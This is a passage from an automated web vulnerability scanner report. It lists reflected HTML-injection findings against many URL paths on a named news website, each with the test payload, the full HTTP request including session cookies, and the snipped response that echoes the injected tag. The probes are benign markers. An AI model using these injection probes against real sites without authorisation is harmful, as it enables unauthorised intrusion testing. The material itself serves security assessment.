Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:21 GMT
Date: Sun, 21 Nov 2010 23:09:21 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_stemcells32e76"><a>2f9c85fc36d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2cd"><a>0b4232b1240 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /multimediaaf2cd"><a>0b4232b1240 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29268
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:57 GMT
Date: Mon, 22 Nov 2010 01:11:57 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_multimediaaf2cd"><a>0b4232b1240"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1b5"><a>d5da876dbe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /multimedia3e1b5"><a>d5da876dbe0/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29269
Vary: Accept-Encoding
Cache-Control: max-age=236
Expires: Sun, 21 Nov 2010 20:19:58 GMT
Date: Sun, 21 Nov 2010 20:16:02 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_multimedia3e1b5"><a>d5da876dbe0"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eb2"><a>01f8e05d095 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/archive88eb2"><a>01f8e05d095/2010-01/15/javascript-hack-enables-flash-on-iphone HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 22 Nov 2010 01:21:53 GMT
Date: Mon, 22 Nov 2010 01:11:53 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_news ss_archive88eb2"><a>01f8e05d095 c_2010-01"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e94db"><a>4cebf2d1561 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/archive/2010-01e94db"><a>4cebf2d1561/15/javascript-hack-enables-flash-on-iphone HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 22 Nov 2010 01:22:18 GMT
Date: Mon, 22 Nov 2010 01:12:18 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_news ss_archive c_2010-01e94db"><a>4cebf2d1561"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c427d"><a>e6d5b4a7516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politicsc427d"><a>e6d5b4a7516 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29299
Vary: Accept-Encoding
Cache-Control: max-age=239
Expires: Mon, 22 Nov 2010 01:15:40 GMT
Date: Mon, 22 Nov 2010 01:11:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politicsc427d"><a>e6d5b4a7516"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70abd"><a>9d24c849cc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics70abd"><a>9d24c849cc4/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29300
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 20:20:15 GMT
Date: Sun, 21 Nov 2010 20:16:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics70abd"><a>9d24c849cc4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 209da"><a>9d347d00209 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics209da"><a>9d347d00209/law HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:03 GMT
Date: Sun, 21 Nov 2010 23:09:03 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics209da"><a>9d347d00209 ss_law"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82c1"><a>05b6fbcb3c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics/lawd82c1"><a>05b6fbcb3c6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:31 GMT
Date: Sun, 21 Nov 2010 23:09:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics ss_lawd82c1"><a>05b6fbcb3c6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623f2"><a>92180a2ca9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics623f2"><a>92180a2ca9b/onlinerights HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29328
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:05 GMT
Date: Sun, 21 Nov 2010 23:09:05 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics623f2"><a>92180a2ca9b ss_onlinerights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ecce"><a>b1a59a8a533 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics/onlinerights3ecce"><a>b1a59a8a533 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29328
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:32 GMT
Date: Sun, 21 Nov 2010 23:09:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics ss_onlinerights3ecce"><a>b1a59a8a533"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5482e"><a>d19474f130 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics5482e"><a>d19474f130/security HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29318
Vary: Accept-Encoding
Cache-Control: max-age=229
Expires: Sun, 21 Nov 2010 23:12:58 GMT
Date: Sun, 21 Nov 2010 23:09:09 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics5482e"><a>d19474f130 ss_security"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f2a3"><a>f519379c247 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics/security5f2a3"><a>f519379c247 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29320
Vary: Accept-Encoding
Cache-Control: max-age=555
Expires: Sun, 21 Nov 2010 23:18:52 GMT
Date: Sun, 21 Nov 2010 23:09:37 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics ss_security5f2a3"><a>f519379c247"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da50c"><a>af7f20fae3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceda50c"><a>af7f20fae3a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29259
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:42 GMT
Date: Mon, 22 Nov 2010 01:11:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceda50c"><a>af7f20fae3a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb46"><a>7e95b9b5c37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science8fb46"><a>7e95b9b5c37/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29260
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Sun, 21 Nov 2010 20:03:06 GMT
Date: Sun, 21 Nov 2010 19:59:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science8fb46"><a>7e95b9b5c37"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96ddf"><a>cdde2cce323 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science96ddf"><a>cdde2cce323/discoveries HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29286
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:10 GMT
Date: Sun, 21 Nov 2010 23:09:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science96ddf"><a>cdde2cce323 ss_discoveries"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38394"><a>ab4904fcd7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries38394"><a>ab4904fcd7d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29286
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:35 GMT
Date: Sun, 21 Nov 2010 23:09:35 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries38394"><a>ab4904fcd7d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd1d"><a>538a6317253 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencecbd1d"><a>538a6317253/discoveries/news/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:55 GMT
Date: Sun, 21 Nov 2010 23:12:55 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencecbd1d"><a>538a6317253 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da6c"><a>360db666dd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries3da6c"><a>360db666dd0/news/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:13 GMT
Date: Sun, 21 Nov 2010 23:13:13 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries3da6c"><a>360db666dd0 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a30c"><a>b820a999ffb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news3a30c"><a>b820a999ffb/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
